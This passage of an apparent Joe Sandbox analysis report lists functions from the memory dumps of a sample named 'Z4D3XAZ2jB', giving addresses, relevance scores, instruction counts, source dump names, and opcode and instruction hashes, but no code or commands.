                                                                                                                                • Opcode Fuzzy Hash: 5243620f03fdb4b93a147e5c3f7e6f023520dfc23b0b20261f52b4d460387e32
                                                                                                                                • Instruction Fuzzy Hash: 0021263AB0D39A8FD702A7A8D8252EDBB60EF91321F0945B6C164CB1D3DB34261AC751
                                                                                                                                Function 00007FFD9B761EBD Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 16a85cd61b161768256e40a4b3f075bcfabee67b008b2396366c286c96eee3e2
                                                                                                                                • Instruction ID: fc6adfd18d1437b653eb1d675d128efc8ddbda35285b5ed6b0974e894093aaf7
                                                                                                                                • Opcode Fuzzy Hash: 16a85cd61b161768256e40a4b3f075bcfabee67b008b2396366c286c96eee3e2
                                                                                                                                • Instruction Fuzzy Hash: 15210930A1861ECFDB94EFA8C8999ADB3F1FF28301B11067AD019D36A1DF34A941CB41
                                                                                                                                Function 00007FFD9BE32790 Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 365d157643b60ae21777a60736a6908286c335048d014679142e80c9ee48a70b
                                                                                                                                • Instruction ID: 4468c3ef6ba408c18d643d85adcb5d14c446cfa784c688baf34f59a51dcafa5d
                                                                                                                                • Opcode Fuzzy Hash: 365d157643b60ae21777a60736a6908286c335048d014679142e80c9ee48a70b
                                                                                                                                • Instruction Fuzzy Hash: 3611E720E2D42E87F63CD6C884705B4779AFF90345B254676D0DB8B5EACC2DFA819780
                                                                                                                                Function 00007FFD9BE3D0F0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbe15607efc33651796af57eaef1821ed7d2053a706b5b78de8d3f1a1d11606a
                                                                                                                                • Instruction ID: 4cbf557951f8695fb5fb05e3c71e8a222cdb3701fedc79f8813240a294354906
                                                                                                                                • Opcode Fuzzy Hash: dbe15607efc33651796af57eaef1821ed7d2053a706b5b78de8d3f1a1d11606a
                                                                                                                                • Instruction Fuzzy Hash: B1018856E0F1DA0FE73172B818B54F63F598F5329870A04FAE09D4B0E7DD0925078396
                                                                                                                                Function 00007FFD9BE39460 Relevance: .1, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c347198930fd0eede97c883c6bffeec801dfaec5aad55c283a9135f1d1106b9a
                                                                                                                                • Instruction ID: 15e40c327b098dc9b43da62b4712f190a1342268c2cfd3ebe43190c8a9d507f6
                                                                                                                                • Opcode Fuzzy Hash: c347198930fd0eede97c883c6bffeec801dfaec5aad55c283a9135f1d1106b9a
                                                                                                                                • Instruction Fuzzy Hash: 7E11E320B68A0D4EDB64EB64A4A19F977D5EF44214F50067AD44EC75E3CE2AA5478380
                                                                                                                                Function 00007FFD9BE4FF0E Relevance: .1, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c75aa437f89918ae59a1ab0c8e4a5acfc651a10ff8635d08e759e0a2dc5da887
                                                                                                                                • Instruction ID: 915b0f9c9652ce1a609f63509a3f5cf932a327256c699fa2e1a511b0ea285091
                                                                                                                                • Opcode Fuzzy Hash: c75aa437f89918ae59a1ab0c8e4a5acfc651a10ff8635d08e759e0a2dc5da887
                                                                                                                                • Instruction Fuzzy Hash: C6112B30A1990D9FDF9CDB58C4A5ABDB7A1FF59710F0000BEE00ED36A2CE3569408B41
                                                                                                                                Function 00007FFD9B761588 Relevance: .1, Instructions: 58COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 38ad4f923432688733125da965a825c1712427684a0c05c13d560a721413a258
                                                                                                                                • Instruction ID: a5b09dc5e248e4fd72e2948163e7f7f1f3b401f55fb244f524437f71f8b47f90
                                                                                                                                • Opcode Fuzzy Hash: 38ad4f923432688733125da965a825c1712427684a0c05c13d560a721413a258
                                                                                                                                • Instruction Fuzzy Hash: 7E11E735B0D79A8FD702EB74C8243E8BB60EF42311F0946B6C155CB1E3DA34261AC751
                                                                                                                                Function 00007FFD9BE31810 Relevance: .1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a0f3f07f8afe2557268a3cf22f2a835f479be79e8deca3f9116fc2ec1b687535
                                                                                                                                • Instruction ID: d902ef2e4e05786b9df10e1a201cd80c6879482ce5f85f7a3c59f869138cfc75
                                                                                                                                • Opcode Fuzzy Hash: a0f3f07f8afe2557268a3cf22f2a835f479be79e8deca3f9116fc2ec1b687535
                                                                                                                                • Instruction Fuzzy Hash: B601E510B78A885EDB68E7799465AB937D1AF85304B0406BED08EC35E7CD29E6058340
                                                                                                                                Function 00007FFD9BE30F3C Relevance: .1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2138307a28f37c4f6a1106e664f941ad21eff9e7493bf9e5b9be5531e6682f83
                                                                                                                                • Instruction ID: 34baf5644b5f720b71caf397878ed1cc592f236579549e5bfdd339026f070368
                                                                                                                                • Opcode Fuzzy Hash: 2138307a28f37c4f6a1106e664f941ad21eff9e7493bf9e5b9be5531e6682f83
                                                                                                                                • Instruction Fuzzy Hash: 1501B502F1F6CF4EE77541A818756BC1B449F55A60F1B01B7D48DCA1E3DC0B6E4AA382
                                                                                                                                Function 00007FFD9B761590 Relevance: .1, Instructions: 52COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1026b9f4a0d587837682caa628351a06f4602ab3e3619d873b5bad081c66241e
                                                                                                                                • Instruction ID: 7d5f50d881f53a9bb1996245270e399ea411ee30bbe094f035cd2f58700ea3a7
                                                                                                                                • Opcode Fuzzy Hash: 1026b9f4a0d587837682caa628351a06f4602ab3e3619d873b5bad081c66241e
                                                                                                                                • Instruction Fuzzy Hash: 0511C675B0D79A8FD702EB64C8243E97B60EF42311F0946B6C555CB1E3CA382619C751
                                                                                                                                Function 00007FFD9BE36CA8 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 69d5cabe76c9ef6ccecf319036e051ca944b7a132d8fc5ba804817ec68e76208
                                                                                                                                • Instruction ID: 62be8d759839de56117d29c6b82345783c0abf42ee1d35c785e481164d416166
                                                                                                                                • Opcode Fuzzy Hash: 69d5cabe76c9ef6ccecf319036e051ca944b7a132d8fc5ba804817ec68e76208
                                                                                                                                • Instruction Fuzzy Hash: 7011D634E1981E8FCB98DF98D4609ADB7B5FF58300F140179D00EE3290CA39A9018B10
                                                                                                                                Function 00007FFD9BE3168E Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e85b2b94c2696df03db42bd2b687f70c978b98f13550a87746a3ca8defe3b88d
                                                                                                                                • Instruction ID: eac3ec19143a516d9d80fb06c5822ce0a8a260c3e0a02d94153bb2f4d88857da
                                                                                                                                • Opcode Fuzzy Hash: e85b2b94c2696df03db42bd2b687f70c978b98f13550a87746a3ca8defe3b88d
                                                                                                                                • Instruction Fuzzy Hash: 75014520398ACA4BE708DA7CD8657E83B84EB52304F2802AEC94DC72E3C92A9640C300
                                                                                                                                Function 00007FFD9BE34ABF Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 44dd926afa826dde2a023b079ae9b029d141b25ce8c84d95f08117da6ed935dc
                                                                                                                                • Instruction ID: d2f493a245107ae40e735ee47c224abefc5e5a1c231a0d962211979a1889bdb1
                                                                                                                                • Opcode Fuzzy Hash: 44dd926afa826dde2a023b079ae9b029d141b25ce8c84d95f08117da6ed935dc
                                                                                                                                • Instruction Fuzzy Hash: E1F0C231B0CA084EDB58EB6C68562FC77D1EB99326B14017FD58EC35A6DE2698438381
                                                                                                                                Function 00007FFD9B764AC1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 05a416b02ca97e92681fc8dfc3bbd8dc8cfdee11fe750a732c2dfee0b3001d34
                                                                                                                                • Instruction ID: 10da032faa0f4f44b0fef7e3d2cdfb9fd00215b6730ec13db9730d43e9b6c4a4
                                                                                                                                • Opcode Fuzzy Hash: 05a416b02ca97e92681fc8dfc3bbd8dc8cfdee11fe750a732c2dfee0b3001d34
                                                                                                                                • Instruction Fuzzy Hash: EB114C30A0561A8FEB68EB54C8547A9B3F0FF54305F4042E5D04DA21A1CE786E85CF81
                                                                                                                                Function 00007FFD9B761598 Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 873bf08b485836f2e432db19f704bb5f76d73d98a337c89299a439434f842012
                                                                                                                                • Instruction ID: 356643903b2ef2c1c4b0880b136e70573efbc8e2a0ada12359b906c0e5495bd7
                                                                                                                                • Opcode Fuzzy Hash: 873bf08b485836f2e432db19f704bb5f76d73d98a337c89299a439434f842012
                                                                                                                                • Instruction Fuzzy Hash: 7511A175A0E39A8ED702ABA4C8246E97B60EF42311F0946BAC4558B1E3CA382619C752
                                                                                                                                Function 00007FFD9BE30C67 Relevance: .0, Instructions: 45COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6443aaf2765c53f6d92904035f8b351c3a488356c117b367e3779801d8da6cef
                                                                                                                                • Instruction ID: 26d5f9bfcb751c475bcb31d149d76b48e9f6250465257e0a20a987546613ff5d
                                                                                                                                • Opcode Fuzzy Hash: 6443aaf2765c53f6d92904035f8b351c3a488356c117b367e3779801d8da6cef
                                                                                                                                • Instruction Fuzzy Hash: 73014B31B1891D9FD768E69CE0616BCB391FF49720B55417AD01EC3292CA24BC52C7C4
                                                                                                                                Function 00007FFD9BE37A4B Relevance: .0, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2b4b33c2e97411cc2c8a1d4c4df35023702c708060f48a6050e97e1514d97f81
                                                                                                                                • Instruction ID: da156f7931247425dcdab0df7c03ed6ba6535a0cc9c49f04c96371a98937e56f
                                                                                                                                • Opcode Fuzzy Hash: 2b4b33c2e97411cc2c8a1d4c4df35023702c708060f48a6050e97e1514d97f81
                                                                                                                                • Instruction Fuzzy Hash: F3016D3090894CCFCF98EF58C855FD877B5EBA8315F0401AAD00DE72A1DA32AAC0CB40
                                                                                                                                Function 00007FFD9BE37A4A Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 66e467b4b79b35296c725460dd78eeaf049c8faf9663eb333abcfb5dd6e1fd85
                                                                                                                                • Instruction ID: dce386e4d1b09b4aec033480ec91e8e7ed70d091302b5671e984c11ccfe1ce48
                                                                                                                                • Opcode Fuzzy Hash: 66e467b4b79b35296c725460dd78eeaf049c8faf9663eb333abcfb5dd6e1fd85
                                                                                                                                • Instruction Fuzzy Hash: 1D01FB3190894CCFCF98EF58C859FD877B1EBA8315F1401AAD40DE72A1DA36AAC5CB40
                                                                                                                                Function 00007FFD9BE37AC2 Relevance: .0, Instructions: 40COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 37185683fd683b51c983057079bf1b48ac7488930a2aab17d54e020dff94018e
                                                                                                                                • Instruction ID: dbf42075e8d6659295a7d1c979720c05bc59a817622a1bca565913b80a77bcdf
                                                                                                                                • Opcode Fuzzy Hash: 37185683fd683b51c983057079bf1b48ac7488930a2aab17d54e020dff94018e
                                                                                                                                • Instruction Fuzzy Hash: 80F0623154F2CA9FD7268BB088618E63FB8EF43314B1900F6D085C70B2E66E5B4AC761
                                                                                                                                Function 00007FFD9B7615A0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 56417f8788fc6a51959693b646c50803ca6a9504b08a04903c3cda63a7c179f1
                                                                                                                                • Instruction ID: c581124cddc6ad6fb7fdb51560b517f73c0d50c7445740689f6635d0229fe230
                                                                                                                                • Opcode Fuzzy Hash: 56417f8788fc6a51959693b646c50803ca6a9504b08a04903c3cda63a7c179f1
                                                                                                                                • Instruction Fuzzy Hash: 8F019274E0E3DA8ED7029BA488246ED7B61EF06310F0946F6C4158B1E7CE382604C756
                                                                                                                                Function 00007FFD9BE3475A Relevance: .0, Instructions: 38COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 75f56dec7a40dcf764e45974c9879000b5c47209fb68cd376a9667496cdf6a62
                                                                                                                                • Instruction ID: 44933483f93d06c00d0727f726a65546e83ecfcf19da08c4dd53423960d31457
                                                                                                                                • Opcode Fuzzy Hash: 75f56dec7a40dcf764e45974c9879000b5c47209fb68cd376a9667496cdf6a62
                                                                                                                                • Instruction Fuzzy Hash: 68F0FF75F1D55E8FEF64DA84C4215FE77B5FF48341F110639D10AE21A0EE2A26508B50
                                                                                                                                Function 00007FFD9B760705 Relevance: .0, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 411b3edc4ec16d0c008fe9324e2a3e68cf1fc8912906b536e13e1e57aef65194
                                                                                                                                • Instruction ID: 76008321b425bc158db621a93904180c808618d39c773fd9f55f7bd2dac61d0b
                                                                                                                                • Opcode Fuzzy Hash: 411b3edc4ec16d0c008fe9324e2a3e68cf1fc8912906b536e13e1e57aef65194
                                                                                                                                • Instruction Fuzzy Hash: 1FF01D30A15A0E9FDB54EF9894996EE77A0FB54301F110536E41CC21A4DA3466A49B81
                                                                                                                                Function 00007FFD9B760728 Relevance: .0, Instructions: 30COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a76a76986759a5c3fcad6ba10a36a7c2c5f817ca8ac038c1ce410f1a09abc2c3
                                                                                                                                • Instruction ID: 1e79ffc1828025d321018831cebaacca78ae53fcc7dbd7883e1c2e416e238f56
                                                                                                                                • Opcode Fuzzy Hash: a76a76986759a5c3fcad6ba10a36a7c2c5f817ca8ac038c1ce410f1a09abc2c3
                                                                                                                                • Instruction Fuzzy Hash: 2AF08230D15A0D9FDB50EF94D4486EE77E0FF14301F000526E81CC3164CA30A6A4DB81
                                                                                                                                Function 00007FFD9BE30118 Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b91353160be37f3a45390756d0c2017c3e14531d184d23cd011e0f17e47ee6db
                                                                                                                                • Instruction ID: 60ba6c0cc5a147f0d42477483d52dd84093247267ad0b59902eaae7a4a44ef8e
                                                                                                                                • Opcode Fuzzy Hash: b91353160be37f3a45390756d0c2017c3e14531d184d23cd011e0f17e47ee6db
                                                                                                                                • Instruction Fuzzy Hash: 7CC0122030E414DFD2A1DB68C414B3A3AA8EF05740B1201A1F009CB1B2C51ADD00CB10
                                                                                                                                Function 00007FFD9BE392BB Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                • Instruction ID: c52d5ae55279361e3e9eb70b13be3883f4b5883775045d9be8eee0c4a67f7de1
                                                                                                                                • Opcode Fuzzy Hash: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                • Instruction Fuzzy Hash: CBD0C92CB0F90F86F27946D160B823A61DC5F40300E62443ED46F429E1CF1FB7016601
                                                                                                                                Function 00007FFD9BE3166B Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3b71acf1f619134dacc06a6d2281176aaa09fa432f7e3917ecedb2f6e1ca3ece
                                                                                                                                • Instruction ID: 606a1866a0bd02204dcc55a29eeb21ac350b1ecc61953d7aec989727cda122f0
                                                                                                                                • Opcode Fuzzy Hash: 3b71acf1f619134dacc06a6d2281176aaa09fa432f7e3917ecedb2f6e1ca3ece
                                                                                                                                • Instruction Fuzzy Hash: 31D0C910F0F64F89F23846D14030279169C9F05300E2B003DC05F418FACD2F7B816613
                                                                                                                                Function 00007FFD9BE387D3 Relevance: .0, Instructions: 6COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                • Instruction ID: 7c8e38624d2ef4130053b85e50b9e56239f4f189be2a283211e0ce92d074da92
                                                                                                                                • Opcode Fuzzy Hash: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                • Instruction Fuzzy Hash: 2BB09200F0E20F83E53000F0047103C00890B84284A620735A50A852E2DC4B3A006351
                                                                                                                                Function 00007FFD9BE30BA1 Relevance: .0, Instructions: 6COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7ccc973479dafff2a15bd748560dc36330f1fba9484759093e3554eba46f06c3
                                                                                                                                • Instruction ID: 4023b18e707feb7a6bc7506c61fa9ccdac22c578f5468be24c985608443ed702
                                                                                                                                • Opcode Fuzzy Hash: 7ccc973479dafff2a15bd748560dc36330f1fba9484759093e3554eba46f06c3
                                                                                                                                • Instruction Fuzzy Hash: C9B01200F3E30B97F33400F4047423C01850B48704E520530D14B851E3DC4D3E002150

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00007FFD9B761300 Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
